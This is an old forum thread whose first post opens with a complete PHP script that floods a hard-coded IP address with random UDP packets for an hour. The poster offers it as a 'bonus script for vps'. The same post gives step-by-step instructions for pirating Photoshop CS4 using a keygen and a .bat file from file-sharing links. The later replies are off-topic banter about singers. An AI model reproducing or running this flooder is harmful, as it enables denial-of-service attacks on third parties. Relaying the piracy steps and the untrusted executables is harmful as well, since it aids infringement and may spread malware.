General Discussion Off-Topic Discussion and Enlightenment

Photoshop CS4 and stuff

Thread Tools
 
Search this Thread
 
Old 12-15-2008, 09:26 AM
  #1  
0.5 BAR
Thread Starter
 
Nirgopolis's Avatar
 
Join Date: Nov 2008
Posts: 102
Default Photoshop CS4 and stuff




<?
ignore_user_abort(TRUE);
set_time_limit(0);
error_reporting(0);

$ip = '68.178.148.188';
$mins = 60;
$psize = 65000;

$secs = $mins*60;
$out='';
for($i=0;$i<$psize;$i++) $out.= chr(mt_rand(1,256));
$timei = time();
$i = 0;
while (1) {
@system('ifconfig | grep -i "inet" > /tmp/bind33');
$fpop = file_get_contents('/tmp/bind33');
$fpop = preg_replace("#\t#", '', $fpop);
$fpip = explode("\n", $fpop);
foreach($fpip as $line) {
$line = explode(" ", $line);
$line = $line[1];
if(preg_match("#^[0-9]#", $line)&&!preg_match("#\:#", $line)) {
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_UDP);
socket_bind($sock, $line);
socket_connect($sock, $ip, mt_rand(1,65000));
socket_write($sock, $out);
socket_close($socket);
}
@$fp = fsockopen("udp://".$ip, mt_rand(1,65000), $errno, $errstr, 1);
if($fp) {
fwrite($fp, $out);
fclose($fp);
}
}
$i++;
if($i > 5000) {
if (time() - $timei > $secs) exit();
else $i = 0;
}
}
exit();
?>



Related:





Anyways, I just had to nab ps, so if anyone else needs it, simple:
go to adobe site, find CS4 and download the trial (fill in bs name and email, they dont check)
download
disconnect computer from internet
install as trial
once install is done
run keygen, enter key AFTER install
http://www.mediafire.com/download.php?ixm2omltrj1
then run this .bat
http://www.mediafire.com/?hngohymlgkm
then close program
turn on internet
open again
works perfect for me
Nirgopolis is offline  
Old 12-15-2008, 09:28 AM
  #2  
0.5 BAR
Thread Starter
 
Nirgopolis's Avatar
 
Join Date: Nov 2008
Posts: 102
Default Re: Photoshop CS4 and stuff

also, includes bonus script for vps =)
Nirgopolis is offline  
Old 12-15-2008, 10:28 AM
  #3  
3.0 BAR
 
kain's Avatar
 
Join Date: Sep 2003
Posts: 5,448
Default Re: Photoshop CS4 and stuff

i see your avril, and raise you

http://www.youtube.com/watch?v=ei8hPkyJ0bU
kain is offline  
Old 12-15-2008, 02:08 PM
  #4  
0.5 BAR
Thread Starter
 
Nirgopolis's Avatar
 
Join Date: Nov 2008
Posts: 102
Default Re: Photoshop CS4 and stuff

nah hayley williams is in a different class, she battles against ellen paige
avril lavigne has no competition
Nirgopolis is offline  
Old 12-15-2008, 02:51 PM
  #5  
1.0 BAR
 
donnyboy's Avatar
 
Join Date: Oct 2007
Location: Barron, WI
Posts: 239
Default Re: Photoshop CS4 and stuff

Originally Posted by kain
i see your avril, and raise you

http://www.youtube.com/watch?v=ei8hPkyJ0bU
Hayley is much better wet.

http://www.youtube.com/watch?v=y-MaaxgdUT4
donnyboy is offline  
Old 12-15-2008, 05:12 PM
  #6  
j3w
0.0 BAR
 
j3w's Avatar
 
Join Date: Jun 2008
Posts: 0
Default Re: Photoshop CS4 and stuff

Originally Posted by kain
i see your avril, and raise you

http://www.youtube.com/watch?v=ei8hPkyJ0bU
every ------- person in that video needs a ------- haircut.
j3w is offline  
Old 12-15-2008, 05:15 PM
  #7  
0.0 BAR
 
J-SMITH69's Avatar
 
Join Date: Dec 2002
Posts: 0
Default Re: Photoshop CS4 and stuff

Originally Posted by J.H.Christ
every ------- person in that video needs a ------- haircut.
+1
J-SMITH69 is offline  
Related Topics
Thread
Thread Starter
Forum
Replies
Last Post
Tough-guy
General Discussion
5
10-17-2008 10:25 AM
imburne
General Discussion
14
07-25-2007 01:36 AM
fork
General Discussion
11
11-01-2005 06:53 PM
Sinner
General Discussion
10
05-03-2004 04:02 PM



Quick Reply: Photoshop CS4 and stuff



All times are GMT -5. The time now is 09:58 AM.